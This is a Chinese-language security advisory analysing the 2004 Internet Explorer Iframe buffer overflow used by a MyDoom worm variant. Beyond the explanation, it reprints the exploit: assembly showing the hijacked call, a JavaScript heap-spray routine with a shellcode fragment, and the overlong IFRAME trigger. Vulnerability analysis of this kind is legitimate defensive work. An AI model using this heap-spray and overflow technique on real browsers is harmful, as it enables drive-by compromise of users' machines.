網路攻擊關鍵報告 - IE Iframe 弱點之攻擊碼
解析與防範 |
2004/11/05 美國電腦緊急事故處理小組(CERT)發出 IE Iframe 與 Frame 弱點警告美國各級相關單位,嚴防有心人士利用這個弱點,讓網路威脅再升級‧
最近新竄起的 MyDoom 新型蠕蟲,就是針對 IE Iframe 這個弱點,發動全面圍剿,讓 IE 使用者不得安寧‧
DragonSoft 弱點稽核小組,提出這個弱點的原理分析與暫時降低風險解決方案,讓使用者降低威脅風險,度過這個關鍵期:
IE Iframe Buffer Overflow 分析:
- Iframe 弱點解析
IE Iframe 和 Frame 都是 HTML 框架標記的一種使用語法,這個 Iframe(Frame)問題存在簽屬 SRC 與 Name 時緩衝區缺乏適當驗證,
而導致緩衝區溢位(Buffer Overflow).
The BoF sets eax to 0x0D0D0D0D after which this code gets executed:
7178EC02 8B08 MOV ECX, DWORD PTR [EAX]
[0x0D0D0D0D] == 0x0D0D0D0D, so ecx = 0x0D0D0D0D.
7178EC04 68 847B7071 PUSH 71707B84
7178EC09 50 PUSH EAX
7178EC0A FF11 CALL NEAR DWORD PTR [ECX]
Again [0x0D0D0D0D] == 0x0D0D0D0D, so we jump to 0x0D0D0D0D.
- Iframe 弱點攻擊解析
(1) 利用 script Shell 程式碼
<SCRIPT language="javascript">
shellcode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u01
78%u52ea%u89eb");
// Nopslide will contain these bytes: bigblock = unescape("%u0D0D%u0D0D");
// Heap blocks in IE have 20 dwords as header headersize = 20;
// This is all very 1337 code to create a nopslide that will fit exactly
// between the the header and the shellcode in the heap blocks we want.
// The heap blocks are 0x40000 dwords big, I can't be arsed to write good
// documentation for this.
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
// And now we can create the heap blocks, we'll create 700 of them to spray
// enough memory to be sure enough that we've got one at 0x0D0D0D0D
memory = new Array();
for (i=0;i<700;i++) memory[i] = block + shellcode;
</SCRIPT>
(2) 在 Iframe SRC=file: 夾帶超長字串
<IFRAME SRC=file://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAA........NAME="CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCC............??">
</IFRAME>
| |
